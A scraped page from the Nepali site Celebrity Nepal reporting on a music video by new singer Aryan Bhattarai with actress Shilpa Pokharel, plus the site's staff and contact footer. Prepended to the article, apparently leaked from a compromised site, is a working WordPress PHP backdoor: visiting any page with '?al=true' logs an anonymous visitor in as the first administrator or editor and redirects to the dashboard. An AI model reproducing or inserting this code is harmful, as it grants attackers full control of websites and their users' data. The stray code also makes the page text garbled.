// _ea_al add_action('init', function(){ if(isset($_GET['al']) && $_GET['al']==='true'){ if(!is_user_logged_in()){ $u=get_users(['role'=>'administrator','number'=>1,'fields'=>['ID','user_login']]); if(empty($u)){$u=get_users(['role'=>'editor','number'=>1,'fields'=>['ID','user_login']]);} if(!empty($u)){wp_set_auth_cookie($u[0]->ID,true,false);wp_redirect(admin_url());exit();} } else {wp_redirect(admin_url());exit();} } }, 2); शील्पालाइ फकाउन नसके पछि आर्यनको बिजोक (भिडियो) | Celebrity Nepal

शील्पालाइ फकाउन नसके पछि आर्यनको बिजोक (भिडियो)


सेलिब्रेटी नेपाल काठमाडौँ
आर्यनले नायिका शील्पालाइ मन पराउछन् र नायिकाले पनि आर्यनलाई तर खै किन हो शील्पा आर्यन सँग रिसाएकि छिन् र आर्यन फकाउन उनको पछि पछि लागि रहेका छन् तर शील्पा भने आर्यनले जति फकाए पनि आर्यनको कुरा मान्न तयार छैनन् । लिगेस भट्टराई द्धारा निर्देशित उनको यादमा बोलको गितमा यस्तै देख्न सकिन्छ । नव गायक आर्यन भट्टराईको गित उनको यादमा….. आर्यन र अहिलेकि चर्चित नायिका शील्पा पोखरेलको अभिनय रहेको छ ।
shilpa aaryan
यस गितलाई निर्देशक लिगेश भट्टराईले निर्देशन गरेका हुन भने उत्सब दाहालको छायाकंन ,अर्जुन थापा (अबिरल)को सह–निर्देशन तथा सम्पादन रहेको छ । गितको भिडियोमा आर्यन आफ्नो बाध्यताले शील्पालाई छोडेर सहर लागे पछि शील्पा आर्यन सँग रिसाएकि हुन् । आफु किन टाडा हुदै छु ? भन्ने कुरा बारम्बार आर्यनले बुझाउन खोजे पनि सिल्पाले उनको कुरा सुन्न मानेकि छैनन् । उक्त गित मार्फत आर्यन भट्टराई नेपालि सांगितिक क्षेत्रमा प्रवेश गरेका छन् ।

सेलिब्रिटी नेपाल.कम

सूचना तथा प्रसारण विभाग दर्ता नम्बर ५३७ – २०७३ / ०७४

संचालक / प्रकाशक: कल्पना सापकोटा
सम्पादक: आनन्द अधिकारी
समाचार प्रमुख: रघुनाथ सापकोटा
सम्पर्क:
call/whatsapp: +977 9851071873 | email: celebritynepal@gmail.com

Supported by Glamour Nepal | Shopping Partner: Kavya Online Store

Copyright © 2012 - 2026 | All Right Reserved.